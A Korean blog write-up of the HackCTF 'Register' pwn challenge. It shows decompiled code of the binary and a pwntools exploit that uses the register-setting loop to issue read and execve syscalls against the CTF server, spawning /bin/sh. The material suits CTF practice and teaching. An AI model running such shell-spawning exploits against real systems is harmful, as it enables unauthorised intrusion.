ii4gsp
HackCTF - Register 본문
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
alarm(5u);
setvbuf(stdout, 0LL, 2, 0LL);
build();
}main()
void __noreturn build()
{
__int64 v0; // [rsp+0h] [rbp-40h]
__int64 v1; // [rsp+8h] [rbp-38h]
__int64 v2; // [rsp+10h] [rbp-30h]
__int64 v3; // [rsp+18h] [rbp-28h]
__int64 v4; // [rsp+20h] [rbp-20h]
__int64 v5; // [rsp+28h] [rbp-18h]
__int64 v6; // [rsp+30h] [rbp-10h]
unsigned __int64 v7; // [rsp+38h] [rbp-8h]
v7 = __readfsqword(0x28u);
signal(14, (__sighandler_t)handler);
while ( 1 )
{
do
{
get_obj(&v0);
obj = v0;
qword_6010A8 = v1;
qword_6010B0 = v2;
qword_6010B8 = v3;
qword_6010C0 = v4;
qword_6010C8 = v5;
qword_6010D0 = v6;
}
while ( (unsigned int)validate_syscall_obj(v0) );
raise(14);
}
}build()
__int64 __fastcall get_obj(_QWORD *a1)
{
printf("RAX: ");
*a1 = get_ll();
printf("RDI: ");
a1[1] = get_ll();
printf("RSI: ");
a1[2] = get_ll();
printf("RDX: ");
a1[3] = get_ll();
printf("RCX: ");
a1[4] = get_ll();
printf("R8: ");
a1[5] = get_ll();
printf("R9: ");
a1[6] = get_ll();
return 0LL;
}get_obj()
__int64 get_ll()
{
char nptr; // [rsp+0h] [rbp-30h]
unsigned __int64 v2; // [rsp+28h] [rbp-8h]
v2 = __readfsqword(0x28u);
get_inp(&nptr, 32);
return atol(&nptr);
}get_ll()
__int64 __fastcall get_inp(void *a1, int a2)
{
int v3; // [rsp+1Ch] [rbp-4h]
v3 = read(0, a1, a2);
if ( v3 == -1 )
exit(0);
if ( *((_BYTE *)a1 + v3 - 1) == 10 )
*((_BYTE *)a1 + v3 - 1) = 0;
return (unsigned int)(v3 - 1);
}get_inp()
__int64 __fastcall validate_syscall_obj(signed __int64 a1)
{
unsigned int v2; // [rsp+14h] [rbp-4h]
if ( a1 == 2 )
{
v2 = 0;
}
else if ( a1 > 2 )
{
if ( a1 == 3 )
{
v2 = 0;
}
else
{
if ( a1 != 60 )
return 1;
v2 = 0;
}
}
else if ( a1 )
{
if ( a1 != 1 )
return 1;
v2 = 0;
}
else
{
v2 = 0;
}
return v2;
}validate_syscall_obj()
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3026)
e = ELF('./register')
def register(rax, rdi, rsi, rdx):
r.sendlineafter('RAX: ', str(rax))
r.sendlineafter('RDI: ', str(rdi))
r.sendlineafter('RSI: ', str(rsi))
r.sendlineafter('RDX: ', str(rdx))
r.sendlineafter('RCX: ', '0')
r.sendlineafter('R8: ', '0')
r.sendlineafter('R9: ', '0')
register(0, 0, e.get_section_by_name('.data').header.sh_addr, 10)
r.send('/bin/sh\x00')
register(0x3b, e.get_section_by_name('.data').header.sh_addr, 0, 0)
sleep(5)
r.interactive()Exploit
'시스템 해킹 > HackCTF' 카테고리의 다른 글
| HackCTF - Unexploitable #2 (0) | 2020.11.26 |
|---|---|
| HackCTF - RTC (0) | 2020.05.05 |
| HackCTF - SysROP (0) | 2020.05.05 |
| HackCTF - Unexploitable #1 (0) | 2020.05.05 |
| HackCTF - You are silver (0) | 2020.03.05 |
'시스템 해킹/HackCTF' Related Articles
more
Comments